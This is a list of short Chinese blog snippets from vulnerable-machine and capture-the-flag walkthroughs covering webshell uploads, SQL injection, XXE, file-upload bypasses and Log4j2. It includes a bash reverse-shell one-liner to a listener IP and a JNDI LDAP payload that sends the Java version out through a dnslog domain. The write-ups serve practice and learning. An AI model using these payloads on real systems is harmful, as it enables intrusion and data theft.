- 博客(13)
- 收藏
- 关注
原创 Web-Machine-N7靶机通关攻略
打开enter_network目录,提交一次密码,第二次提交时候抓包可以抓到cookie和role。访问exploit.html,发现能提交文件,但是都被提交到了本机,在F12前端修改为目标靶机。打开登录页面,发现需要admin身份,我们抓包修改role字段,得到剩下半个flag。发现role是加密内容采用url,base64和md5解密。扫描ip,端口,目录。发现结果是admin。
2025-03-21 00:25:55
237
原创 wordpress漏洞getshell
1.在docker启动靶场,使用9595端口,访问。4.我们在网络搜索可得,该PHP文件的目录位置。5.我们拼接url,访问该页面,访问成功。3.我们输入一句话木马,并保存。2.发现他的模板文件可以修改。6.用蚁剑尝试连接,成功。
2025-03-20 19:34:36
332
原创 VULNHUB靶场-matrix-breakout-2-morpheus
发现可以上传抓包查看一下,发现使用post传输,且有上传地址,尝试上传一句话木马,成功。1.arp-scan扫描ip,nmap扫描端口,dirsearch扫描目录。2.访问80端口,访问graffiti.php。使用蚁剑写入php文件,里面写入反弹shell。在kali开启666端口监听。
2025-03-19 20:07:05
181
原创 jocker靶场通关
发送到攻击模块进行如下配置,根据上面的txt文档使用指定的密码本进行爆破,成功发现账号密码。使用账号密码登陆成功,发现使用cms框架,用弱口令尝试登录,成功。1.arp扫描,发现靶机ip为192.168.111.141。发现登录的账号密码被用base64加密。同样使用弱口令登录成功。
2025-03-19 00:13:47
140
原创 billiu靶机getshell
用bp抓包,将show修改为上传的1.jpg的位置,在url后加上所传的参数echo “bash -i >& /dev/tcp/192.168.111.128/8888 0>&1” | bash使其进行反弹shell,我们在kali监听8888端口。4.直接访问ip,访问/test,发现可能存在文件包含漏洞,尝试get和post提交数据,发现post可行。发现可以直接下载文件,下载c.php文件打开发现数据库密码。6.发现进入文件上传页面,制作图片马上传,一句话木马为。2.扫描该主机的端口。
2025-03-18 22:19:50
195
原创 log4j2漏洞攻略
5.使用DNSlog检测dns回显,先申请一个子域名,尝试查看java版本构造url:47.93.4.110:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jkhjzi.dnslog.cn},访问,返回出java版本,存在漏洞。利用JNDI注入工具把这个反弹shell命令部署到LDAP服务上去,在工具的同目录下输入命令。1.云服务器上启动靶机,查看端口,发现是8983。9.选用以下url,构造url,7.反弹shell的命令。
2025-03-17 16:23:03
335
原创 hackme靶机getshell流程
6.用bp拦截搜索的请求头,保存为1.txt文件在sqlmap目录下,使用sqlmap工具尝试注入。11.登录superadmin,发现可以文件上传,直接上传一句话木马,发现没有拦截规则。8.查看数据库名,发现关键数据库webapphacking,指定该数据库,查看表。10.发现superadmin的密码的MD5值,比较难解,放到网站尝试。2.使用kali的arp扫描同段ip发现靶机IP。5.注册用户并登录,发现搜索框,尝试注入。3.使用dird扫描出目录。7.注入尝试成功,可以注入。
2025-03-13 23:35:45
189
原创 文件解析漏洞靶场解析全集详解
原理:在网站下建立名字为 .asp/.asa 的文件夹,其内的任何拓展名的文件都会被IIS当作asp文件解析并且执行。1.在虚拟机打开win server2003,安装iis服务,查看虚拟机的ip地址,在物理机访问2.在网站根目录新建1.asp目录文件,在目录中新建cao.txt文档,内容为时间函数<% =now();%>3.在物理机打开该文件发现时间函数被执行。
2025-03-13 21:31:21
943
原创 文件上传漏洞tamato打靶记录
6.扫描端口,发现2211端口开启,利用bp向其中传入一句话木马。4.找到敏感文件phpinfo,打开源码,发现提示。1.用kali的arp-scan扫描同段ip。5.使用文件包含漏洞,查看日志文件。2.用dirb扫到目录,尝试打开。7.用蚂剑进行连接,成功。
2025-03-12 22:18:59
206
原创 upload -lib 1-19关
17.用条件竞争绕过,先上传一张正确图片找到上传的位置,开启代理用bp一直攻击靶场,用另外一个浏览器一直访问该目录下的该php文件,直到成功,发现在该目录下找到webshell.php,用哥斯拉连接,密码cmd,成功。13.先在第一关中用抓包上传一个include.php文件,再利用该文件把图片马包含到页面上执行,上传一个图片🐎,获得图片马的地址,再用include.php文件传参读出上传的图片马。16.上传二次渲染后的图片马,用include.php文件传参读出上传的图片马。9.抓包,在后缀后加. .
2025-03-12 01:01:48
385
原创 xxe-lab 通关攻略
2.任意输入用户名和密码,我们发现username有回显,进行抓包尝试,发现用xml传输数据,可以尝试进行xml实体注入。3.讲抓到的数据包发送到重放器,进行修改采用file伪协议抓取d:1.txt文件。1.打开xxe-lab靶场。
2025-03-10 22:10:40
261
原创 XXE靶机通关获得flag
12.在后台管理员登陆页面输入得到的密码和账号得到提示,并打开源码查看,发现目录,打开该目录,发现加密后的flag,通过编码内容可以判断出采用的是base32编码。8.开启代理 打开bp尝试抓包,发现使用xml传输账号,密码,可以尝试xml实体注入。9.发送到重放器,我们知道后台登陆的php文件位置,尝试读取文件,查看是否有账户和密码。13在线解码可得一串新编码,可以发现该编码为base64编码,再次解码可得一个目录。5,使用dirb对目标靶机ip进行扫描,获取靶机的目录信息。
2025-03-10 21:50:20
258
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅